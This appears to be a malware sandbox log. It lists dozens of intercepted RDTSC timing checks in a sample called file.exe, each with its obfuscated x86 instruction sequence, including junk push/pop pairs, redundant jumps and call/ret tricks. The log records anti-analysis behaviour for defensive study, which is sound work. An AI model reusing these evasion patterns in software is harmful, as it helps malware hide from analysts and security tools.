                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5C51 second address: CF5CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6999135DECh 0x00000008 jmp 00007F6999135DF5h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 xor edx, 20DCA12Fh 0x00000017 push 00000000h 0x00000019 jg 00007F6999135DF2h 0x0000001f push 953C198Fh 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jng 00007F6999135DE6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5CA1 second address: CF5CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F699913D2FFh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5CB8 second address: CF5D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 6AC3E6F1h 0x0000000e mov esi, dword ptr [ebp+122D19DAh] 0x00000014 push 00000003h 0x00000016 sub cl, 00000001h 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c mov ebx, edx 0x0000001e mov edi, dword ptr [ebp+122D3719h] 0x00000024 popad 0x00000025 push 00000003h 0x00000027 mov esi, 695D5100h 0x0000002c push D2A67BD0h 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F6999135DF8h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5D04 second address: CF5D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5D08 second address: CF5D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 12A67BD0h 0x0000000e xor edi, 2D29AB7Ch 0x00000014 lea ebx, dword ptr [ebp+12447AADh] 0x0000001a mov ecx, edx 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5D2A second address: CF5D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FDh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5D8C second address: CF5D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5D95 second address: CF5D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5D99 second address: CF5E01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push edx 0x0000000e call 00007F6999135DF4h 0x00000013 or ecx, 6DCE424Fh 0x00000019 pop esi 0x0000001a pop edx 0x0000001b mov dword ptr [ebp+122D1926h], esi 0x00000021 push 00000000h 0x00000023 jmp 00007F6999135DF3h 0x00000028 jng 00007F6999135DECh 0x0000002e xor dword ptr [ebp+122D1A95h], edx 0x00000034 push B0E0DCABh 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5E01 second address: CF5E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5E07 second address: CF5E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5EE6 second address: CF5FA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F699913D2FCh 0x0000000c popad 0x0000000d push eax 0x0000000e ja 00007F699913D2FAh 0x00000014 push esi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop esi 0x00000018 nop 0x00000019 jmp 00007F699913D305h 0x0000001e push 00000000h 0x00000020 push CFA907EFh 0x00000025 jmp 00007F699913D309h 0x0000002a add dword ptr [esp], 3056F891h 0x00000031 jmp 00007F699913D301h 0x00000036 push 00000003h 0x00000038 cld 0x00000039 push 00000000h 0x0000003b mov edx, dword ptr [ebp+122D376Dh] 0x00000041 push 00000003h 0x00000043 jmp 00007F699913D2FCh 0x00000048 push 90A89D00h 0x0000004d jmp 00007F699913D307h 0x00000052 add dword ptr [esp], 2F576300h 0x00000059 mov di, 8E49h 0x0000005d lea ebx, dword ptr [ebp+12447AC1h] 0x00000063 mov ecx, 722B0825h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5FA4 second address: CF5FC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15004 second address: D15022 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F699913D2FAh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F699913D2F6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15022 second address: D15028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15028 second address: D15037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F699913D2F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15037 second address: D1503D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15379 second address: D1537F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1537F second address: D15383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15383 second address: D15387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15387 second address: D1539D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6999135DE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F6999135DE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1539D second address: D153A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1550B second address: D15511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156E7 second address: D156EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156EB second address: D156EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15B56 second address: D15B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F699913D2FAh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEDF3B second address: CEDF41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEDF41 second address: CEDF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A26 second address: D16A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6999135DF0h 0x00000009 jmp 00007F6999135DF8h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A53 second address: D16A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F699913D306h 0x00000009 jp 00007F699913D2F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A73 second address: D16AA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6999135DEEh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F6999135DF2h 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16AA9 second address: D16AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16F32 second address: D16F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b ja 00007F6999135DE6h 0x00000011 pop ecx 0x00000012 ja 00007F6999135DE8h 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2117 second address: CE2132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FEh 0x00000009 popad 0x0000000a jo 00007F699913D307h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2132 second address: CE2156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6999135DEBh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6999135DF3h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B4E0 second address: D1B4E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8D4D second address: CE8D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232C1 second address: D232E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F699913D306h 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232E6 second address: D232EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238A1 second address: D238A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238A5 second address: D238BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F6999135DEDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238BE second address: D238D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D2FDh 0x00000007 js 00007F699913D2F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238D5 second address: D238DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238DF second address: D238E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238E3 second address: D238EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238EC second address: D23903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F699913D2F8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23903 second address: D23914 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6999135DECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23914 second address: D2391E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24E2B second address: D24E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6999135DEDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24E44 second address: D24E4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2558D second address: D25591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25591 second address: D25597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25597 second address: D2559D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2563A second address: D25689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 xchg eax, ebx 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F699913D2F8h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 0000001Ch 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 jmp 00007F699913D307h 0x00000025 push eax 0x00000026 pushad 0x00000027 jc 00007F699913D2F8h 0x0000002d push esi 0x0000002e pop esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D259C4 second address: D259D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25A94 second address: D25A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27B01 second address: D27B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28F69 second address: D28F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28F70 second address: D29032 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6999135DE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6999135DF0h 0x00000012 nop 0x00000013 mov esi, dword ptr [ebp+122D1AB3h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F6999135DE8h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 mov di, A7B1h 0x00000039 mov edi, dword ptr [ebp+122D272Dh] 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007F6999135DE8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b mov di, E7AAh 0x0000005f jmp 00007F6999135DF5h 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 jmp 00007F6999135DEFh 0x0000006b jmp 00007F6999135DF5h 0x00000070 popad 0x00000071 push eax 0x00000072 js 00007F6999135E00h 0x00000078 push eax 0x00000079 push edx 0x0000007a push ebx 0x0000007b pop ebx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF50 second address: D2AF6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF6F second address: D2AF73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2ED7F second address: D2EDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F699913D306h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d jbe 00007F699913D302h 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30E3B second address: D30E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30E41 second address: D30E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F699913D2FDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3100C second address: D31011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32068 second address: D3206D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33064 second address: D33068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33F3A second address: D33FA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F699913D2FCh 0x0000000c popad 0x0000000d push eax 0x0000000e jne 00007F699913D309h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F699913D2F8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f pushad 0x00000030 cld 0x00000031 add edi, 09420D5Ch 0x00000037 popad 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D1F3Ch], edi 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push ebx 0x00000048 push esi 0x00000049 pop esi 0x0000004a pop ebx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34F09 second address: D34F20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F6999135DE6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F6999135DECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34F20 second address: D34F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34118 second address: D341AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F6999135DE8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, eax 0x00000027 jbe 00007F6999135DEFh 0x0000002d pushad 0x0000002e mov ebx, eax 0x00000030 add bx, 847Bh 0x00000035 popad 0x00000036 push dword ptr fs:[00000000h] 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F6999135DE8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 jns 00007F6999135DECh 0x0000005d sub dword ptr [ebp+122D33FAh], edx 0x00000063 mov dword ptr fs:[00000000h], esp 0x0000006a add ebx, 6CA65DD5h 0x00000070 mov eax, dword ptr [ebp+122D0BE1h] 0x00000076 push FFFFFFFFh 0x00000078 mov bl, ah 0x0000007a nop 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e jbe 00007F6999135DE6h 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34F24 second address: D34FA0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F699913D2FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F699913D2F8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jne 00007F699913D2FEh 0x0000002b push 00000000h 0x0000002d mov edi, esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F699913D2F8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b jc 00007F699913D2F6h 0x00000051 sub dword ptr [ebp+122D2610h], ecx 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34FA0 second address: D34FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34FA5 second address: D34FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3518F second address: D35193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36117 second address: D3611C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3611C second address: D36141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6999135DFBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36141 second address: D36147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
